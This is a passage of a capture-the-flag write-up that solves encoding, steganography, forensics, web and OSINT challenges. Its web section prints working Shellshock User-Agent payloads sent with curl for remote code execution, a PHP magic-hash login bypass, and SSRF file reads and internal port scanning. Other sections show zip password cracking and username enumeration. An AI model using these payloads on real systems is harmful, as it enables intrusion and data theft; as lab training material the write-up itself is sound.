    MTAwMTEwMTAwMDBjMTAxMDAxMTAwMTAxMTEwMDExYjExMDExMDEwMDExMTEwMDAxMWYxMTExMTAwMDEwMTEwMTExMTExMTAwMDFmMTEwZDEwMTAxMTExMTExMDAxMTEwMTEwMTExMTAxMTExMTAxMDEwMDExMWYxMDAwMTExMTExMTEwMTExMWYxMDAwMDAxMDAwZTEwMDExMTAwMTEwMTAwMTExMTAxMDExMDEwMTAwMTExMTAwMDExMDExMTAwMTEwMDAwMDEwMDBlMTAwMDEwMDAwMWQ=
    ```
- BASE64:
    ```
    10011010000c101001100101110011b110110100111100011f111110001011011111110001f110d101011111110011101101111011111010100111f10001111111101111f1000001000e1001110011010011110101101010011110001101110011000001000e1000100001d
    ```
- BINARY:
    ```
    1232c170355b223715f16300017f6d377751060135f73711f520e22071507627206152e545d
    ```
- OCTAL:
    ```
    666c61677b75725f3768335f6d34353733725f30665f336e637279703731306e357d
    ```
- ASCII HEX:
    ```
    flag{ur_7h3_m4573r_0f_3ncryp710n5}
    ```

![thats_a_lotta_encoding_flag.png](img/thats_a_lotta_encoding_flag.png)

## xrypto xhallenge - 100 - By ~T4r0

> They told me this is the flag but it doesn't work for me:

> `w}pvjH!dNv!eN|"N%}}Ni!cuNdaNsc!l`

- The name is a hint to **XOR**
- Open [gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
- Paste the encrypted text!
- Search for `XOR`
- Use `XOR Brute Force`

![xcrypto_flag.png](img/xcrypto_flag.png)

```
Key = 11: flag{Y0u_g0t_m3_4ll_x0rd_up_br0}

flag{Y0u_g0t_m3_4ll_x0rd_up_br0}
```

## Seriously, what the fck is this? -  100 - By ~T4r0

File: [message.txt](chall/message.txt)

- Looks like JSFuck
- Search for jsfuck decoder
- [lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)
- Paste the contents to the page
- Select JSFuck

![jsfuck_flag.png](img/jsfuck_flag.png)

    alert('flag{JS_c4n_b3_r34lly_ugly}')

    flag{JS_c4n_b3_r34lly_ugly}

## Baseically everything the cook prepared - 100 - By ~T4r0

```
9l<EY;HHJ(@X;07<`iB[@5CV5>";%K<)lt#:,>4T;J^;,A6*5?@;J8-;,ft?=%+iB>&.q1@7Y&f@n&dV@9-9I;J]Jm=_q8;=))D,@95EB<,Q5==%7"K@n0Qd=_go\@VTC.>#[g[:/s/h@7<X?9epX5<)mU2<(1aq>&%);;a`r/ASbmS=)E#&:,5Nu@X;^.;gN+U;--Li@r-*_;eo5d=aFj=;JoB,;JUAi@ocK(<%r!,=%H([A5uZ$
```

- The name is a hint to **BASEn** encoding
- Open [gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
- Paste the challenge text
- Search for base
- Start from Base85 and Go down to Base32

![baseically_everything.png](img/baseically_everything.png)

Base85 --> Base64 --> Base62 --> Base58 --> Base32

```   
flag{Gr34t_y0u_f0und_wh4t_th3_ch3f_w4s_c00k1ng!}
```

## ham, pork, and - 100 - By ~T4r0

> For this challenge, you need to modify the flag a bit to get the usual format.
> Just add the { and } characters after you solved it, no other step required.

```
AABABABABAAAAAAAABBAAAAABAAAAAAAABAABBABABBAAABABBABAAAAABBAAABBBBAABAABBAAABBABBAABAAAAABAABAAAABBBAABAAAAAAAABABABAABAAABBBBABBAAAAABBAABBBAABAABAAABAABABAAABAAABBAABAAABABAABAAAAAABAABAAAABBABBAABBBAAAB
```

- Open it in [gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
- Use `Magic` and it shows it's a **Bacon Cipher**

But it's still not the flag

- Let's change the `Alphabet` option in cyberchef from **Complete** to **Standard**
- And we got the flag!!

![ham_pork_and_flag.png](img/ham_pork_and_flag.png)

```
FLAGBACONMIGHTNOTBEHEALTHYBUTITSDELICIOUS
FLAG{BACONMIGHTNOTBEHEALTHYBUTITSDELICIOUS}
```

## You hear that, Mr. Anderson? - 200 - By ~TheFocusDev

> If you haven't, join our discord server and talk to our discord bot called Agent Smith. To talk to him, you have to message him in a private message, and use the .chall_1 prefix before every message.

> Here is an invite to discord: [discord.gg/eKxYjbV](https://discord.gg/eKxYjbV)

- TODO

## Domino - 250 - By ~T4r0

> domino
> (The flag for this challenge is in Hungarian, to make solving it easier!)

File: [domino.txt](chall/domino.txt)

- TODO

## Raid - 250 - by ~D3V

> Our DNS servers have been raided by state law enforcement groups. Maybe they left a flag somewhere or something?

Do you remember the Data Number Structure warmup challenge?

```
$ dig txt t4ks3c.xyz

; <<>> DiG 9.16.8-Debian <<>> txt t4ks3c.xyz
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61413
;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;t4ks3c.xyz.			IN	TXT

;; ANSWER SECTION:
t4ks3c.xyz.		793	IN	TXT	"cia 123.97.115.99"
t4ks3c.xyz.		793	IN	TXT	"v=spf1 a mx ~all"
t4ks3c.xyz.		793	IN	TXT	"ZmxhZ3sxVFNfNExMVzRZU19ETlN9Cg=="
t4ks3c.xyz.		793	IN	TXT	"fszb 125.255.255.255"
t4ks3c.xyz.		793	IN	TXT	"fbi 49.49.95.114"
t4ks3c.xyz.		793	IN	TXT	"mosad 117.108.51.122"
t4ks3c.xyz.		793	IN	TXT	"nki 102.108.97.103"

;; Query time: 11 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Sun Jan 17 10:03:54 CET 2021
;; MSG SIZE  rcvd: 269
```

- Since this is crypto we must decode something!
- But the base64 stuff is already gone :/
- We left with those ip addresses and National Agency organizations :D

```
cia 123.97.115.99
fszb 125.255.255.255
fbi 49.49.95.114
mosad 117.108.51.122
nki 102.108.97.103
```

```
cia fszb fbi mosad nki
```

- I couldn't get anything useful from this

Messing with the numbers:

- Remove the dots(highlight the whole block in visual mode (V), then hit `:s/\./ /g`)

And this turns to:

    :'<,'>s/\./ /g

```
123 97 115 99
125 255 255 255
49 49 95 114
117 108 51 122
102 108 97 103
```

```
123 97 115 99 125 255 255 255 49 49 95 114 117 108 51 122 102 108 97 103
```

- Paste it into [gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)

We get:

```
{asc}ÿÿÿ11_rul3zflag
```

- Those weird y's are because of 255's so just delete those

```
123 97 115 99 125 49 49 95 114 117 108 51 122 102 108 97 103
```

We got:

```
{asc}11_rul3zflag
```

- We can see there is the flag but in the wrong order

Just play with it and you will get it ;)

```
flag{asc11_rul3z}
```

## Beeping bot - 250 - By ~takov751 and T4r0 and D3v

> Yesterday my bot started beeping randomly. Please help!

> If you haven't, join our discord server. To complete this challenge, you have to join voice chat, the `#Discord challenge 2` channel.
> To invite the bot to voice, type: `?chall_2` to the `#discord_flag` channel.
> The challenge flag has the character `&` instead of `{` and `}`, so replace those accordingly before submitting the flag.

> Here is an invite to discord: [discord.gg/eKxYjbV](https://discord.gg/eKxYjbV)

You have to go into the room, spawn the bot while you are recording the audion.

- [recorded.ogg](chall/recorded.ogg)

- Open the file in `audacity`

You needed to know there is an older encryption type than morse and its name is ***BAIN***.

![bain.jpg](chall/bain.jpg)

```
.--- .... .- .-.. ---- .-. ....- .---- ..-- .---- -.. -.- ....- .---- ..-- ----
```

Decoding manually:

![bain_decoding.png](img/bain_decoding.png)

...

```
FLAG&B41N1SP41N&
```

Replace `&`'s with `{`,`}`:

```
FLAG{B41N1SP41N}

flag{b41n1sp41n}
```

## Back to BASEics - 250 - By ~dovahkiin0424

> I've recived this strange message. Can you decode it?

Hint:

- Don't rely on the chef, cuz' he's dumb!

File: [m3ss4g3.txt](chall/m3ss4g3.txt)

- TODO

# 5. Steganography challenges

## WEEEEEEEEEEEEEEEEEEE - 100 - By ~T4r0

> Feelin a bit dizzy

File: [weeeeeeeeeeeeeee.png](chall/weeeeeeeeeeeeeee.png)

![weeeeeeeeeeeeeee.png](chall/weeeeeeeeeeeeeee.png)

- There is a **swirl** effect on this image!

The easiest way is to use a cli tool here which name is `convert`.
It's a part of the ImageMagick package.

Just search for `imagemagick swirl` in your browser and you will find this page:
[legacy.imagemagick.org/Usage/warping/](https://legacy.imagemagick.org/Usage/warping/)

- This described the usage of swirl too! [legacy.imagemagick.org/Usage/warping/#swirl](https://legacy.imagemagick.org/Usage/warping/#swirl)

Example:
    $ convert koala.gif -swirl 180 swirl.jpg

Let's try it on the challenge!
    $ convert chall/weeeeeeeeeeeeeee.png -swirl 180 out.png

![img/swirled180.png](img/swirled180.png)

- This is not enough!

We need more swirling:
    $ convert chall/weeeeeeeeeeeeeee.png -swirl 700 img/swirled700.png

![img/swirled700.png](img/swirled700.png)

- Finally, it's readable!

```
flag{w0000sh_g035_th3_wh1rlp00l}
```

## u drunk 0r stg? - 100 - By ~\M4t35Z

> Ahh maan I got this image from a random girl I met on a party.  
> But damn this one is so messed up...  
> May you fix it for me and give me the secret message?

> +NOTE: Keep in mind that the flag is case sensitive!

File: [challenge.png](chall/challenge.png)

![challenge](chall/challenge.png)

- Another swirl bud in the other direction :D

```
$ convert chall/challenge.png -swirl -700 img/u_drunk-700.png
```

![u_drunk-700](img/u_drunk-700.png)

- `-700` is too much

Try with a bit less negative swirl:

```
$ convert chall/challenge.png -swirl -400 img/u_drunk-700.png
```

![u_drunk-400.png](img/u_drunk-400.png)

- The flag is readable!

```
flag{Y0u_5p1n_my_h34d_r19h7_r0und}
```

## st3gfuck - 150 - By ~dovahkiin0424

> I have an image with this funny rolled cat. Maybe something is hidden in the image... Can you decode it?

File: [c4t.jpg](chall/c4t.jpg)

![c4t.jpg](chall/c4t.jpg)

- TODO

## Colors - 150 - By ~SyrenDuck

> There is a hidden flag in this picture. Good luck.

File: [colors.png](chall/colors.png)

![colors.png](chall/colors.png)

- TODO

# 6. Forensics challenges

## capture - 100 - By ~takov751

> Look what have i captured.

File: [capture.pcap](chall/capture.pcap)

We have to open this capture file in wireshark in order to be able to analyze the captured traffic.

    wireshark chall/capture.pcap

We can see there was a request made to /flag.zip:

![](img/capture1_ws_flag_zip.png)

- We just need to extract this from the capture file
- And we can easily do that in wireshark!

File --> Export Objects --> HTTP:

![capture1_ws_export.png](img/capture1_ws_export.png)

- Click on `flag.zip` and click `Save`

Cracking the zip:

You can use `zip2john` then crack the hash with `john`,
but sometimes it gets fucked up so it's best to use `fcrackzip` here:

```
$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt flag.zip

found file 'flag/flag.txt', (size cp/uc     34/    22, flags 9, chk 60fc)
checking pw 1nk5lave0844

PASSWORD FOUND!!!!: pw == 1337BullShit
```

- After some time(1-2 min) we get the password!

Now you have to extract the zip file:

```
$ 7z x flag.zip
1337BullShit
```

```
$ cat flag/flag.txt
flag{http_n0t_s3Cur3}
```

## capture 2 - 150 - By ~T4r0

File: [capture2.pcap](chall/capture2.pcap)

We have to open it in `wireshark` again.

![capture2_data](img/capture2_data.png)

- It has some data in it!

RMB --> Copy --> Value

    1f8b080885aee95f0003666c61672e747874004bcb494caf2e372c322ece3029ca8e4f362928292d328e37aae5020075cd58381a000000

- Paste this into [gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)

From Hex --> Gunzip

![capture2_flag.png](img/capture2_flag.png)

    flag{w1r3sh4rk_c4ptur3_2}

### Command line way

```
$ tshark -r capture2.pcap -e data -Tfields
1f8b080885aee95f0003666c61672e747874004bcb494caf2e372c322ece3029ca8e4f362928292d328e37aae5020075cd58381a000000
```

Hex decrypt it:

```
$ echo '1f8b080885aee95f0003666c61672e747874004bcb494caf2e372c322ece3029ca8e4f362928292d328e37aae5020075cd58381a000000' | xxd -r -p > exportfile
$ file exportfile
exportfile: gzip compressed data, was "flag.txt", last modified: Mon Dec 28 10:08:05 2020, from Unix, original size modulo 2^32 26

$ mv exportfile exportfile.gz
```

- It's a gzip file!

Extract it:

```
$ gunzip exportfile.gz
$ cat exportfile
flag{w1r3sh4rk_c4ptur3_2}
```

- CLI FTW!

## Firmware - 150 - By ~takov751

> There is something fishy, since I updated my router. It's been acting weird lately.

File: [firmware.bin](chall/firmware.bin)

We got a `.bin` file. We can try to run `strings` on it but unfortunately, it won't show anything interesting.

But there is a tool called `binwalk` out there which can show us what is exactly in this file.

```
$ binwalk firmware.bin
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
53952         0xD2C0          U-Boot version string, "U-Boot 1.1.3 (Mar 19 2018 - 15:36:42)"
66560         0x10400         LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2986732 bytes
1049088       0x100200        Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 3976959 bytes, 522 inodes, blocksize: 131072 bytes, created: 2021-01-07 11:49:59
```

- It found some things that can be interesting!

Now, we can use `binwalk` again to 'unpack' this file!

But for first, read the manual :D
```
$ man binwalk
---[SNIP]---
Extraction Options:
    -e, --extract
        Automatically extract known file types
```

- Here's what we need `-e` to extract the contents of the file

```
$ binwalk -e firmware.bin
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
53952         0xD2C0          U-Boot version string, "U-Boot 1.1.3 (Mar 19 2018 - 15:36:42)"
66560         0x10400         LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2986732 bytes
1049088       0x100200        Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 3976959 bytes, 522 inodes, blocksize: 131072 bytes, created: 2021-01-07 11:49:59
```

- We got the same output but if you list the directories now you can see there is a new one named `_firmware.bin.extracted`

Let's go into this directory and list the files!

```
$ cd _firmware.bin.extracted
$ ls
squashfs-root  100200.squashfs  10400  10400.7z
```

- We have some weird files (`100200.squashfs`, `10400`), a zip archive (`10400.7z`) and a new directory `squashfs-root`

For first, let's go into this directory and see what's inside :D

```
$ cd squashfs-root
$ ls
bin  dev  etc  lib  mnt  proc  sbin  sys  usr  var  web  linuxrc
```

- This is the root of a unix-based system!

After some exploration we can say this is a very small system but there is no flagfile.
This is the time when we should use `grep` again!

```
$ grep -r 'flag' ./ 2>/dev/null
```

- This returns a lot of results (mainly stuff from `/web`)

Let's filter this `/web` junk out of our results!

```
$ grep -r 'flag' ./ 2>/dev/null | grep -v '/web'
./etc/init.d/rcS:echo "ZmxhZ3tmMXJtdzRyM19mdW59Cg==" > /etc/flag
```

- We got only one result!
- It echoes some encoded string to `/etc/flag` but `/etc/flag` does not exists

We can try to decrypt this string as `base64`:

```
$ echo "ZmxhZ3tmMXJtdzRyM19mdW59Cg==" | base64 -d
flag{f1rmw4r3_fun}
```

***Takeaways***:

- Always think of other extraction tools (like `binwalk`)
- If you can't find the thing by hand, let the computer do it for you ;) (`grep`)
- Encoded strings are always interesting

# 7. Misc challenge

## Never - 150

> I have an other pet project, if you can find it please sub(scribe). Look carefully

> Useful worldlist included :wink:

File: [subdomains-top1million-5000.txt](chall/subdomains-top1million-5000.txt)

- We have to do some subdomain discovery on the target (t4ks3c.xyz)!
- The wordlist is a part of [SecLists](https://github.com/danielmiessler/SecLists)

```
$ ffuf -fw 3 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.t4ks3c.xyz" -u https://t4ks3c.xyz

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.1.0
________________________________________________

 :: Method           : GET
 :: URL              : https://t4ks3c.xyz
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.t4ks3c.xyz
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response words: 3
________________________________________________

www                     [Status: 200, Size: 1184, Words: 466, Lines: 35]
autoconfig              [Status: 200, Size: 59117, Words: 4802, Lines: 380]
autodiscover            [Status: 200, Size: 59117, Words: 4802, Lines: 380]
WWW                     [Status: 200, Size: 1184, Words: 466, Lines: 35]
tube                    [Status: 200, Size: 4159, Words: 562, Lines: 75]
:: Progress: [4997/4997] :: Job [1/1] :: 454 req/sec :: Duration: [0:00:11] :: Errors: 0 ::
```

- www / WWW
- autoconfig
- autodiscover
- tube

We need `tube` here because the other ones are **OUT OF SCOPE**!

There are 3 videos on this PeerTube instance:

![peertube.png](img/peertube.png)

- [tube.t4ks3c.xyz/videos/watch/a18a3288-2a02-4793-8a81-a1639f855a4b](https://tube.t4ks3c.xyz/videos/watch/a18a3288-2a02-4793-8a81-a1639f855a4b): just a meme :D
- [tube.t4ks3c.xyz/videos/watch/533fff15-7ec5-4da3-8e11-7188be6c7668](https://tube.t4ks3c.xyz/videos/watch/533fff15-7ec5-4da3-8e11-7188be6c7668): the video we need!
- [tube.t4ks3c.xyz/videos/watch/94c4e588-8bc1-4f1c-9e8b-3b851053389a](https://tube.t4ks3c.xyz/videos/watch/94c4e588-8bc1-4f1c-9e8b-3b851053389a): idk someone had fun trying out the platform xD

Open the Video and go to `01:01` then hit `.` in order to **go forward only one** frame! You have to hit it sometimes and then you will get the qr code around `01:02`:

![never_qr.png](img/never_qr.png)

![never_qr_only.png](img/never_qr_only.png)

Now, we can use `zbarimg` to extract the data of this qr:

```
$ zbarimg -q img/never_qr_only.png
QR-Code:flag{r1ck_4sc111}
```

# 8. Web challenges

## Date app - 200 - By ~T4r0

> I'm really good at programming and using up-to-date software. Prove me wrong maybe?

> **NO AUTOMATED TOOLS REQUIRED TO SOLVE THIS CHALLENGE**

Challenge link: [1337b01s.duckdns.org:8080/](http://1337b01s.duckdns.org:8080/)

Going to the page:

> I'm a 1337 lvl programmer and i made this extremely complicated date application, which gives you the current date.

> You can find it here: [1337b01s.duckdns.org:8080/cgi-bin/dateapp](http://1337b01s.duckdns.org:8080/cgi-bin/dateapp)

/cgi-bin/dateapp:
Sun Jan 17 16:45:06 UTC 2021

- it executes the unix `date` program and prints out the output
- There is an old vulnerability named **SHELLSHOCK** which was common in old **CGI** applications!

Now, we have a `/cgi-bin` directory and a `dateapp` file that runs `date`.
This means `dateapp` is a shell executable sh script.

- SHELLSHOCK depends on a shell executable file and the webserver

***L3T'S PWN Th3 5yS73M!***

Let's hit up [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) which is an AWESOME repo!
And search for shellshock with github's file search (`Go to File`):

There is one match, a python script:

- [github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Shellshock%20CVE-2014-6271.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Shellshock%20CVE-2014-6271.py)

Okay so there is the payload we need in **line 30**:

    'User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command

    User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; <COMMAND>

- If we send a malicious User-Agent string to the shellshock vulnerable application we must get remote code execution.
- At least on paper ;) because there are always blacklists and stuff that makes systems a little more secure :D

I think we could use this script and have fun but that's not we want!
We want to CONTROL everything!

So we will use `curl` here. Check for command execution with the most basic, non-dangerous program like echo.
If my input gets reflected in the output I will know I have found an RCE!

```
$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; echo "asdf"; echo "fghj"' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
asdf
fghj
Content-type: text/html

Sun Jan 17 16:59:37 UTC 2021
```

- rce confirmed :D

Time to find the flag:

```
$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; ls' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
```

- That's what I was talking about.. `ls` didn't work because there are some blacklisted programs :/

No problem because we can use `echo` to **list every file in a directory**!
You can try it on your local machine by running `echo *`. It will list every file and directory in your current working directory.
But these are only the non-hidden files. Hey, I got ya back you can use `echo .*` to **list every hidden file / directory**!

*A neat little trick, isn't it? :D*

```
$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; echo *' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
dateapp flag834658436784685737488435682365ff
Content-type: text/html

Sun Jan 17 17:05:00 UTC 2021
```

- Oh yeah we got it!

Now, we have the filename we just have to print it out somehow.

```
$ curl -H 'User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; cat flag834658436784685737488435682365ff' http://1337b01s.duckdns.org:8080/cgi-bin/dateapp
```

- But cat / tac didn't work

Now, you need to go back a little. there are 2 files in the current directory. `dateapp` and `flag834658436784685737488435682365ff`.
You can access `dateapp` at `/cgi-bin/dateapp` so we should be able to access the flag from:

```
/cgi-bin/flag834658436784685737488435682365ff
```

```
$ curl http://1337b01s.duckdns.org:8080/cgi-bin/flag834658436784685737488435682365ff
flag{1m_sh0ck3d_th4t_th1s_3v3n_3xist3d}
```

- We successfully got the flag!

## Harry Potter and the Order of the Phoenix - 200 - By ~T4r0

> I've found a page, but I can't log in!

> **NO AUTOMATED TOOLS REQUIRED TO SOLVE THIS CHALLENGE**

Link: [1337b01s.duckdns.org:9090/index.php](http://1337b01s.duckdns.org:9090/index.php)

Hint:

- I programmed this app in PHP. I used to be a Python developer, so I just used my knowledge I got there. Maybe type comparison works differently in PHP? I'm not the one who knows.

On the main page we can find a password field and some text:

> This is a page where you login with only a password! Just gotta find the right one by using some big ol' wizardry :)

The hint mentions `type comparison` which can be related to a well-known PHP newb programming error using `==` instead of `===` and so on.

The name of the vulnerability is `PHP Type Juggling` you can search for it and you will surely find some awesome writeups / documentations.

- [owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)

Weird right? But we will make use of it now :D

Let's search for these `magic hashes` and we will find spaze's repo:
[github.com/spaze/hashes/](https://github.com/spaze/hashes/)

Oh, and btw here's my friends's video on php magic hashes:
[youtu.be/DptO8ANsTw8](https://youtu.be/DptO8ANsTw8)

Here comes the question which hash there are tooo many!
Well, for the first blind try I instantly chose md5.

- [github.com/spaze/hashes/blob/master/md5.md](https://github.com/spaze/hashes/blob/master/md5.md)

The first line is the magical :D

    240610708:0e462097431906509019562988736854

So I can give the webapp `240610708` and it should log me in if the vulnerability exists.

Let's try it!

```
$ curl -X POST -d 'passtry=240610708' http://1337b01s.duckdns.org:9090/index.php

---[SNIP]---
<header class="w3-container w3-red w3-center" style="padding:128px 16px">
  <h1 class="w3-margin w3-jumbo">This is a page where you login with only a password! Just gotta find the right one by using some big ol' wizardry :)</h1>
  <form action="/index.php" method="POST">
	  <input type="text" id="passtry" name="passtry"><br><br>
	  <input type="submit" value="Submit">
</form>
</header>
<h1 style="text-align: center;">Congrats! The flag is: <b>flag{cl4ss1c_php_m4g1c}</b></h1>
</body>
</html>
```

    flag{cl4ss1c_php_m4g1c}

So you wonder how did I know the `passtry` parameter.
Let me tell ya :D You can hit `ctrl-u` to view the source of the webpage and there you can see the following line:

    <input type="text" id="passtry" name="passtry"><br><br>

## Gallery app - 200 - By ~T4r0

> I continued my professional web developer carreer by creating another app, which can display images if you enter an URL. Check it out:

> Gallery app: [1337b01s.duckdns.org:8989/](http://1337b01s.duckdns.org:8989/)

> **NO AUTOMATED TOOLS REQUIRED TO SOLVE THIS CHALLENGE**

Hint:

- Think about what the app does, how the application works, and what web vulnerability you can come up with.  
    Once you figured that out, I'll help you even more: the flag is not in any folders, and it's easy to guess its name this time.

Let's open burp and capture the request!

![gallery1_req](img/gallery1_req.png)

Send to Repeater with `ctrl-r` and switch to repeater with `ctrl-shift-r`.
And send the request obviously.

![gallery1_repeater.png](img/gallery1_repeater.png)

- We got some php errors related to file opening problems because it can't open `asdf` (the random string we provided).
- We can try to read local files!

For first, try to read `/etc/passwd`

![gallery1_etc-passwd.png](img/gallery1_etc-passwd.png)

- Success!

Now, it's time to get that flag we need :D

Note that, it's only a get request so we don't need burp to get the flag.
We only need to make a request to `/index.php?url=/flag` and `curl` is the best tool for this.

```
$ curl 1337b01s.duckdns.org:8989/index.php?url=/flag
flag{55RF_15_N0_J0K3}
---[SNIP]---
```

## Gallery app 2 - 250 - By ~T4r0

> I see you've exploited my gallery app. See if you can find the second flag hidden on our internal network. The domain is: comp2.home

> **SOME AUTOMATED TOOLS (OR PROGRAMMING) IS PROBABLY REQUIRED TO SOLVE THIS CHALLENGE**

So they have an internal domain. I can make a request to it to open like a normal webpage like mine:

```
url=https://m4t3sz.gitlab.io
```

![gallery1_web-req](img/gallery1_web-req.png)

Let's try `url=http://comp2.home`!
We still got the error like when we were requesting some random nonexistent stuff.

We must get the correct **port number** and `wfuzz` comes in handy for this work. (`ffuf` can be buggy sometimes or I just messed up something xD)

```
$ wfuzz --hw 65 -w /usr/share/seclists/Fuzzing/5-digits-00000-99999.txt '1337b01s.duckdns.org:8989/index.php?url=http://comp2.home:FUZZ'
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for
more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://1337b01s.duckdns.org:8989/index.php?url=http://comp2.home:FUZZ
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000013338:   200        40 L     91 W       1216 Ch     "13337"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 16842
Filtered Requests: 16841
Requests/sec.: 0
```

- Got the working port `13337`!

```
$ curl 1337b01s.duckdns.org:8989/index.php?url=http://comp2.home:13337

<!DOCTYPE html>
<html lang="en">
<title>Gallery app</title>
<meta charset="UTF-8">
<body>

<h1>Nice work! Here's the flag for you: flag{55RF_C4N_3V3N_B3_U53D_F0R_P0RT_SC4N}</h1>

</body>
</html>
---[SNIP]---
```

The flag is in the output:

    flag{55RF_C4N_3V3N_B3_U53D_F0R_P0RT_SC4N}


# 9. Open-Source Intelligence

## Down the rabbit hole - 250 - By ~?

> One of the creators hid a flag (or a clue to get it) on his twitter. See if you can find it.

> By ~Won't tell, it would make the challenge too EZ :)

- TODO


## Pl4y3r - 350 - By ~\M4t35Z & ~T4r0

> I love playing videogames :D especially with friends!

> My username: `DreggHunKick`

> +NOTE: The flag is not the username; Try Harder ;) ++ You have to find the flag in the right format(`flag{some_text}`), otherwise it's not the flag ;)

Hint:

- MOBA

We have a username so we have to search for it online!

There are two main tools I usually use for username searches:

- [github.com/sherlock-project/sherlock](https://github.com/sherlock-project/sherlock)
- [github.com/soxoj/maigret](https://github.com/soxoj/maigret)

*Both of them are good, but for this challenge, maigret was more reliable.*

Running the tools on the known username:

```
$ maigret DreggHunKick
Sites in database, enabled/total: 1523/1580
[*] Checking username DreggHunKick on:
[+] Chemistlab: http://chemistlab.ru/index/8-0-DreggHunKick
[+] Duolingo: https://www.duolingo.com/profile/DreggHunKick
[+] FortniteTracker: https://fortnitetracker.com/profile/all/DreggHunKick
[+] Gog: https://www.gog.com/u/DreggHunKick
[+] Influenster: https://www.influenster.com/DreggHunKick
[+] Medium: https://medium.com/@DreggHunKick
[?] MirTesen: https://mirtesen.ru/people/DreggHunKick/profile
[+] NameMC (Minecraft.net skins): https://namemc.com/profile/DreggHunKick
[+] Otechie: https://otechie.com/DreggHunKick
[+] Quibblo: https://www.quibblo.com/user/DreggHunKick
[+] Rutracker: https://rutracker.org/forum/profile.php?mode=viewprofile&u=DreggHunKick
[+] Reddit: https://www.reddit.com/user/DreggHunKick
 ┣╸reddit_id: t5_30pnj3
 ┣╸reddit_username: DreggHunKick
 ┣╸fullname: DreggHunKick
 ┣╸image: https://www.redditstatic.com/avatars/avatar_default_07_FFB000.png
 ┣╸is_employee: False
 ┣╸is_nsfw: False
 ┣╸is_mod: False
 ┣╸is_following: True
 ┣╸has_user_profile: True
 ┣╸hide_from_robots: False
 ┣╸created_at: 2020-08-21 21:39:57
 ┣╸total_karma: 1
 ┗╸post_karma: 1
[+] Sevenforums: https://www.sevenforums.com/members/DreggHunKick.html
[+] Twitter: https://twitter.com/DreggHunKick
[+] Taringa: https://www.taringa.net/DreggHunKick
[+] Twitch: https://www.twitch.tv/DreggHunKick
[+] Xbox Gamertag: https://xboxgamertag.com/search/DreggHunKick
[+] eune.op.gg: https://eune.op.gg/summoner/userName=DreggHunKick
[+] vaz04.ru: http://vaz04.ru/index/8-0-DreggHunKick
100%|██████████████████████████████████| 1515/1515 [00:59<00:00, 25.35it/s]
```

As the hint suggests, we need a MOBA(Multiplayer Online Battle Arena) game.

League of Legends is a well-known MOBA game and **op.gg** is a webpage for player statistics.

Let's check it out!

- [eune.op.gg/summoner/userName=DreggHunKick](https://eune.op.gg/summoner/userName=DreggHunKick)

Since the challenge description mentions *'especially with friends'* our next target should be the duo teammate `r34L1337`!

![pl4y3r_recent.png](img/pl4y3r_recent.png)

So, what's next? We have a new username. We have to repeat the first step.

```
$ maigret r34L1337
Sites in database, enabled/total: 1523/1580
[*] Checking username r34L1337 on:
[+] Chemistlab: http://chemistlab.ru/index/8-0-r34L1337
[+] Influenster: https://www.influenster.com/r34L1337
[+] Medium: https://medium.com/@r34L1337
[+] NameMC (Minecraft.net skins): https://namemc.com/profile/r34L1337
[+] Otechie: https://otechie.com/r34L1337
[+] Quibblo: https://www.quibblo.com/user/r34L1337
[+] Sevenforums: https://www.sevenforums.com/members/r34L1337.html
[+] Twitter: https://twitter.com/r34L1337
[+] Taringa: https://www.taringa.net/r34L1337
